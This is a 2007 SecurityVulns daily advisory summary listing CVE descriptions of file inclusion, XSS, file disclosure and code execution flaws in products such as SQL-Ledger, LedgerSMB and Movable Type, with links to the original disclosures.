Computer Security
[EN] securityvulns.ru no-pyccku


Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:28.01.2007
Source:
SecurityVulns ID:7115
Type:remote
Threat Level:
5/10
Description:PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
Affected:SQLLEDGER : SQL-Ledger 2.6
 LOCI : Local Calendar System 1.1
 OPENADS : Max Media Manager 0.1
 OPENADS : Max Media Manager 0.3
 MOVABLETYPES : Movable Type 3.33
 PHPMM : PHP Membership Manager 1.5
 FDSCRIPT : FdScript 1.3
 LEDGERSMB : LedgerSMB 1.1
 OPENCONFERENCE : Open Conference Systems 2.8
CVE:CVE-2007-0860 (** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in local Calendar System 1.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) TEMPLATE_DIR parameter to (a) showinvoices.php, (b) showmonth.php, (c) showevents.php, (d) retrieveinvoice.php, (e) modifyitem.php, and (f) lookup_userid.php; or the LIBDIR parameter to (g) editevent.php, (h) resetpassword.php, (i) signup.php, showmonth.php, (j) showday.php, showevents.php, and lookup_userid.php. NOTE: this issue has been disputed by a third party, who states that the associated variables are set in config.php before use.)
 CVE-2007-0620 (download.php in FD Script 1.3.2 and earlier allows remote attackers to read source of files under the web document root with certain extensions, including .php, via a relative pathname in the fname parameter, as demonstrated by downloading config.php.)
 CVE-2007-0604 (Cross-site scripting (XSS) vulnerability in Movable Type (MT) before 3.34 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the MTCommentPreviewIsStatic tag, which can open the "comment entry screen," a different vulnerability than CVE-2007-0231.)
 CVE-2007-0567 (Cross-site scripting (XSS) vulnerability in admin.php in Interactive-Scripts.Com PHP Membership Manager 1.5 allows remote attackers to inject arbitrary web script or HTML via the _p parameter.)
 CVE-2006-5872 (login.pl in SQL-Ledger before 2.6.21 and LedgerSMB before 1.1.5 allows remote attackers to execute arbitrary Perl code via the "-e" flag in the script parameter, which is used as an argument to the perl program.)
Original documentdocumenttrzindan_(at)_hotmail.com, Open Conference Systems = 2.8.2 Remote File Inclusion (28.01.2007)
 documentsn0oPy.team_(at)_gmail.com, AdMentor (banners) admin SQL injection (28.01.2007)
 documenttrzindan_(at)_hotmail.fr, local Calendar System v1.1 (lcStdLib.inc) Remote File Include (28.01.2007)
 documentChris Travers, Full Disclosure: Arbitrary Code Execution in LedgerSMB CVE-2006-5872 (28.01.2007)
 documentajannhwt_(at)_hotmail.com, FdScript <= v1.3.2 Remote File Disclosure Vulnerability (28.01.2007)
 documentHackers Center Security Group, PHP Membership Manager Cross-Site Scripting Vulnerability (28.01.2007)
 documentMatteo Beccati, [OPENADS-SA-2007-002] Max Media Manager v0.1.29 and v0.3.30 vulnerability fixed (28.01.2007)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod